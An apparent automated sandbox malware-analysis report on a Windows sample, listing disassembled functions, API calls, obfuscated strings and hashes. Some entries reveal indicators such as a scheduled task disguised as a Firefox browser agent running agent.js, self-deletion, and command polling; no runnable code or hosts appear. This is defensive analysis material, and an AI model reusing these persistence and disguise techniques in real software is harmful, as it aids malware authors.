String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
API String ID: 2802545854-3928441437
Opcode ID: 93b22b9fe0e9132853af634c8e47017b94b5fe249e6e0f83ac6cd02ae6516725
Instruction ID: 4f1747183ef39c9e163a287c8b430d5ff1763591a1537bb6dc1676c7936d1086
Opcode Fuzzy Hash: 93b22b9fe0e9132853af634c8e47017b94b5fe249e6e0f83ac6cd02ae6516725
Instruction Fuzzy Hash: 6D417870D04288DEDF10EFA8E859BEEFBB5AF15304F108259D0157B282DB791A4ACB51

Function 00792450 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

task.LIBCPMTD ref: 007924E6
task.LIBCPMTD ref: 007924F2
task.LIBCPMTD ref: 007924FE
task.LIBCPMTD ref: 0079250A
task.LIBCPMTD ref: 00792519

Strings

dzydwibcsmroxflhizzvayjcy, xrefs: 00792482
fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 007924CF
cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 007924A0

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traits
String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
API String ID: 1455298312-3639978120
Opcode ID: 489e54c38b27d6a9945ff3c844703890df1f9bf69f4a233c4d6f28a3b236a14a
Instruction ID: f09ea0c70c25fda15e1d435b1851586ab0771077df5ae52ee8b1820b3550c144
Opcode Fuzzy Hash: 489e54c38b27d6a9945ff3c844703890df1f9bf69f4a233c4d6f28a3b236a14a
Instruction Fuzzy Hash: 2F214A71D04788DADB01DFA8D819BEEBBB5BF16700F108259E4116B291EB791B55CB80

Function 011F64E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167memorynetworkCOMMON

Download Yara Rule

APIs

InternetCrackUrlW.WININET(011FA104,00000000,00000000,0000003C), ref: 011F6545
GetProcessHeap.KERNEL32(00000008,00000001,011FA104), ref: 011F6567
HeapAlloc.KERNEL32(00000000), ref: 011F656A
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 011F65D9
HeapAlloc.KERNEL32(00000000), ref: 011F65DC

Strings

<, xrefs: 011F64FB

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess$CrackInternet
String ID: <
API String ID: 2637570027-4251816714
Opcode ID: 022ad1fb54e6f1deeea9bf4f66048853fcb1c8c545e3d50f2926be6aa877bba1
Instruction ID: f87d3fb5c54403d17be4dee6ec94a19413792e9338050efa3b2aee0537ce0265
Opcode Fuzzy Hash: 022ad1fb54e6f1deeea9bf4f66048853fcb1c8c545e3d50f2926be6aa877bba1
Instruction Fuzzy Hash: B651DF30A002468FEB28CFACD484BAEBBB5FF49314F28446DD655EB611DB71D942CB50

Function 00794D50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00794D87
___except_validate_context_record.LIBVCRUNTIME ref: 00794D8F
_ValidateLocalCookies.LIBCMT ref: 00794E18
__IsNonwritableInCurrentImage.LIBCMT ref: 00794E43
_ValidateLocalCookies.LIBCMT ref: 00794E98

Strings

csm, xrefs: 00794E2D

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: dc7e41ba8194619359d65ee9b65fa004c06da3c5e173ef4b9e2d231d34e70480
Instruction ID: 6c08e63139e1b42fb212834645d5afddf337f701f4628f4ec2387aec47f309e1
Opcode Fuzzy Hash: dc7e41ba8194619359d65ee9b65fa004c06da3c5e173ef4b9e2d231d34e70480
Instruction Fuzzy Hash: 6741D434E00209EBCF10DF68E884E9EBBF5BF45324F148199E9155B392D739AD16CB90

Function 0079A415 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0079A46C
ext-ms-, xrefs: 0079A480

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 4ae8f3f031cbb7b23eb252990c79b044b6059e083eec6c37d992c9fc0ece33d0
Instruction ID: 3a140306b5172c137b1038f40b58393246ed3e65181a0892d0eaf462819f8c11
Opcode Fuzzy Hash: 4ae8f3f031cbb7b23eb252990c79b044b6059e083eec6c37d992c9fc0ece33d0
Instruction Fuzzy Hash: E721EE71906260BBDF218B2CBC48F5F37649B42760F114110ED09A72E1E6BCED00D6E7

Function 0079219E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

operator!=.LIBCPMTD ref: 00792294
task.LIBCPMTD ref: 007922A5
task.LIBCPMTD ref: 007922B4

Strings

lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa, xrefs: 007921E5
ianh, xrefs: 007921D1
oyr, xrefs: 007921F6

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
API String ID: 2802545854-2962047866
Opcode ID: 02df582df4acd92695109580807627f203bf8fc2170c7caa74ea1381c42e8c2f
Instruction ID: 57cbe137c37698cb2bd8d3d131dc486a88a86357427bf3f03d6351717ac1df04
Opcode Fuzzy Hash: 02df582df4acd92695109580807627f203bf8fc2170c7caa74ea1381c42e8c2f
Instruction Fuzzy Hash: 77313A70D04758EEEF20DB68D859BEEBBB1AB05704F10419DE00577282EB791B89CF61

Function 00799DCE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00799D96: _free.LIBCMT ref: 00799DBB

_free.LIBCMT ref: 00799E1C

Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA

_free.LIBCMT ref: 00799E27
_free.LIBCMT ref: 00799E32
_free.LIBCMT ref: 00799E86
_free.LIBCMT ref: 00799E91
_free.LIBCMT ref: 00799E9C
_free.LIBCMT ref: 00799EA7

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
Instruction ID: 68576327420f4624c5c451f82fff33a43f2dd9b28627f83d40a550a55f4a49bf
Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
Instruction Fuzzy Hash: FA118131A45B04EAEE30BBB5EC4BFCBB79E5F01740F804818B39D66052DA3DB5458750

Function 011F7230 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramData%,?,00000104), ref: 011F724A
PathCombineW.SHLWAPI(?,?,agent.js), ref: 011F7263

Part of subcall function 011F6AD0: VariantInit.OLEAUT32(?), ref: 011F6AE7
Part of subcall function 011F6AD0: CoCreateInstance.OLE32(011F1020,00000000,00000001,011F1000,?), ref: 011F6B04
Part of subcall function 011F6AD0: SysAllocString.OLEAUT32(\Mozilla), ref: 011F6B44
Part of subcall function 011F6AD0: SysFreeString.OLEAUT32(?), ref: 011F6B7B
Part of subcall function 011F6AD0: SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6B88
Part of subcall function 011F6AD0: SysFreeString.OLEAUT32(00000000), ref: 011F6B9F

Part of subcall function 011F9040: GetFileAttributesW.KERNEL32(?,011F7279), ref: 011F9041

DeleteFileW.KERNEL32(?), ref: 011F7284
ExitProcess.KERNEL32 ref: 011F728C

Strings

%ProgramData%, xrefs: 011F7245
agent.js, xrefs: 011F7250

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: String$AllocFileFree$AttributesCombineCreateDeleteEnvironmentExitExpandInitInstancePathProcessStringsVariant
String ID: %ProgramData%$agent.js
API String ID: 1026123424-2175136953
Opcode ID: 4c2c1be187d0c15e919e934460deb41de29e8b62b10b6be76435e50fbdf3bcf0
Instruction ID: 18875fb7f230db04ab6188183614c64080974db52c1c25af4213684130c16809
Opcode Fuzzy Hash: 4c2c1be187d0c15e919e934460deb41de29e8b62b10b6be76435e50fbdf3bcf0
Instruction Fuzzy Hash: 9FF065B140421CABD728EBA0DC4DFD9777CAB04304F0044BDB76692054DBB056C8CF64

Function 0079BFF8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0079C040
__fassign.LIBCMT ref: 0079C225
__fassign.LIBCMT ref: 0079C242
WriteFile.KERNEL32(?,0079AD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0079C28A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0079C2CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0079C372

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 5dfd227333b0c761d94a4415f751fda7da175626748c6d17f0331486f981fe3b
Instruction ID: 76e57f1eed1dfacc9238d8f0c92dd0ab5f85666b10bb073fa8cb00eb0d4badff
Opcode Fuzzy Hash: 5dfd227333b0c761d94a4415f751fda7da175626748c6d17f0331486f981fe3b
Instruction Fuzzy Hash: 6BC19EB1D042589FCF15CFE8D8849EDBBB5AF49314F28816AE856BB342D2359D42CF60

Function 011F8144 Relevance: 9.1, APIs: 6, Instructions: 81sleepstringthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 011F7DD6
lstrcmpA.KERNEL32(00000000,INIT), ref: 011F7DE3
StrToIntA.SHLWAPI(00000000), ref: 011F7EA6
GetTickCount64.KERNEL32 ref: 011F82AB

Part of subcall function 011F55F0: GetProcessHeap.KERNEL32(00000008,00000001,011F7E6E,00000001,00000000), ref: 011F55F3
Part of subcall function 011F55F0: HeapAlloc.KERNEL32(00000000), ref: 011F55FA

StrToIntA.SHLWAPI(00000000), ref: 011F81A4
StrToIntA.SHLWAPI(?), ref: 011F81AD
CreateThread.KERNEL32(00000000,00000000,Function_000072A0,00000000,00000000,00000000), ref: 011F81C1
CloseHandle.KERNEL32(00000000), ref: 011F81CC

Part of subcall function 011F5610: GetProcessHeap.KERNEL32(00000000,00000000,011F82F5), ref: 011F5617
Part of subcall function 011F5610: HeapFree.KERNEL32(00000000), ref: 011F561E

Sleep.KERNEL32(00000000), ref: 011F8306

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
String ID:
API String ID: 1253608127-0
Opcode ID: 66e5b396ecfbdc60653f36e6f2b4e2abbad010aa77bd39f13a3fa72d75aa8a19
Instruction ID: 9f86b69c287d8977ea1b114636150bee1fefd981931520fda1453665a26ccc61
Opcode Fuzzy Hash: 66e5b396ecfbdc60653f36e6f2b4e2abbad010aa77bd39f13a3fa72d75aa8a19
Instruction Fuzzy Hash: 1221B535E0061697DF2CAFB4E850B7FB679AF84714F00452DEB26A72C4DB74A900C7A9

Function 007950A4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0079509B,00794C89,007943FF), ref: 007950B2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007950C0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007950D9
SetLastError.KERNEL32(00000000,0079509B,00794C89,007943FF), ref: 0079512B

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: fe5747c060d69441aa663b52adfaa83a3f52fb9977f11fd4fb00689d38d47120
Instruction ID: c4dafae929d70c31186f533eb6a30bc4471dcfabb1471d0cb304e863912bd3af
Opcode Fuzzy Hash: fe5747c060d69441aa663b52adfaa83a3f52fb9977f11fd4fb00689d38d47120
Instruction Fuzzy Hash: 9801F732909B35DEAF2627B47C8A72B2B54EB96775730432AF610451F1FF9D4C056348

Function 00791BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

task.LIBCPMTD ref: 00791C63
task.LIBCPMTD ref: 00791C72

Strings

O, xrefs: 00791CA4
ggieqzszmbzlvilbxhiegdimtjzyfwhho, xrefs: 00791C08, 00791C20, 00791C3D

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traits
String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
API String ID: 1455298312-2259853572
Opcode ID: 7da92fb6d65c858e77ca5f2390231b829e448ddfb0418109ec3b1e09cc6d6c21
Instruction ID: 9dddcc4d631c76a4f2f204cab162b18c40bcf3941371081c2a49ceaafcc52aef
Opcode Fuzzy Hash: 7da92fb6d65c858e77ca5f2390231b829e448ddfb0418109ec3b1e09cc6d6c21
Instruction Fuzzy Hash: 94414B70D44209DBDF14CFA8E995BADBBB1FB06304F604229E412AB281EB7C5A54DB64

Function 00791FF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

task.LIBCPMTD ref: 0079204A
task.LIBCPMTD ref: 00792056
task.LIBCPMTD ref: 00792065

Strings

* , xrefs: 00792022
zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 00792029

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traits
String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
API String ID: 1455298312-2972419988
Opcode ID: 523f4e6790787a01cf263af7ad1369ab0bf32ad64d2e3c54de32401c531b1026
Instruction ID: fef6091e616ab1d74e9365fafe36cb72b48a9a1de466f275de66ba2a1cfde26f
Opcode Fuzzy Hash: 523f4e6790787a01cf263af7ad1369ab0bf32ad64d2e3c54de32401c531b1026
Instruction Fuzzy Hash: 63111B71D04648EACF04DFA8E859BEEF7B5EF09710F108659E82177291EF391618CB94

Function 00797627 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,007975D9,?,?,007975A1,?,?,?), ref: 0079763C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0079764F
FreeLibrary.KERNEL32(00000000,?,?,007975D9,?,?,007975A1,?,?,?), ref: 00797672

Strings

mscoree.dll, xrefs: 00797635
CorExitProcess, xrefs: 00797647

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 87eb4c86782e44d3427f9698e774951d48169fb12509aba375fee780b4ef7933
Instruction ID: 4947887c96f9d20c0d0889870521c9e410a50f5017e4ef6a572927b0e32d50b4
Opcode Fuzzy Hash: 87eb4c86782e44d3427f9698e774951d48169fb12509aba375fee780b4ef7933
Instruction Fuzzy Hash: E7F0A735611719FBEF119B54DC09BDE7E78EB81796F404160F500A21A0CB788E00DB98

Function 00799D2D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00799D45

Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA

_free.LIBCMT ref: 00799D57
_free.LIBCMT ref: 00799D69
_free.LIBCMT ref: 00799D7B
_free.LIBCMT ref: 00799D8D

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 44629269dbd2d18a87173cda0e86e4c7f6dc554b68677a5636144c2dd3ace751
Instruction ID: 2fabe44138c384566167d15d067328a907fd4c50051033b01e74833ce7af4fe4
Opcode Fuzzy Hash: 44629269dbd2d18a87173cda0e86e4c7f6dc554b68677a5636144c2dd3ace751
Instruction Fuzzy Hash: 76F01272619600A7AE78EB6CF4C5C1AB3EAAA417107588809F508E7651CB3CFCC18A75

Function 00796E05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\DWbCUTdGhV.exe, xrefs: 00796E43, 00796E4A, 00796E7E

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\DWbCUTdGhV.exe
API String ID: 0-778015232
Opcode ID: 0158d1e0dfa25a7687c9dfe32d98ec0e49f0e2d33a3830050bac5c01d0219047
Instruction ID: e2c7833a3075814724db9bf8d60addd84ef2f61408062fd4aad32d9f94616636
Opcode Fuzzy Hash: 0158d1e0dfa25a7687c9dfe32d98ec0e49f0e2d33a3830050bac5c01d0219047
Instruction Fuzzy Hash: 07319E75A00219EBCF21DF99EC89D9EBBB9EB86710B10416AF504E7250E7789E40CB50

Function 007961B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00796163,00000000,?,007A8D08,?,?,?,00796306,00000004,InitializeCriticalSectionEx,007A1C98,InitializeCriticalSectionEx), ref: 007961BF
GetLastError.KERNEL32(?,00796163,00000000,?,007A8D08,?,?,?,00796306,00000004,InitializeCriticalSectionEx,007A1C98,InitializeCriticalSectionEx,00000000,?,007960BD), ref: 007961C9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 007961F1

Strings

api-ms-, xrefs: 007961D6

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1192868d021524fd346d052682ff358eee33d1c0694ebf07c82541f41ad075d3
Instruction ID: 81ccbce6391ee738503041364539d07a0968cc67fcd2901a357d9b896d262f93
Opcode Fuzzy Hash: 1192868d021524fd346d052682ff358eee33d1c0694ebf07c82541f41ad075d3
Instruction Fuzzy Hash: 1FE04F302C4209B7FF202B60FD07B5A3E59DB41B90F508530FA0DE80E2EB6DD9919599

Function 00795184 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0079524B
___AdjustPointer.LIBCMT ref: 0079526E
___AdjustPointer.LIBCMT ref: 0079530A

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity
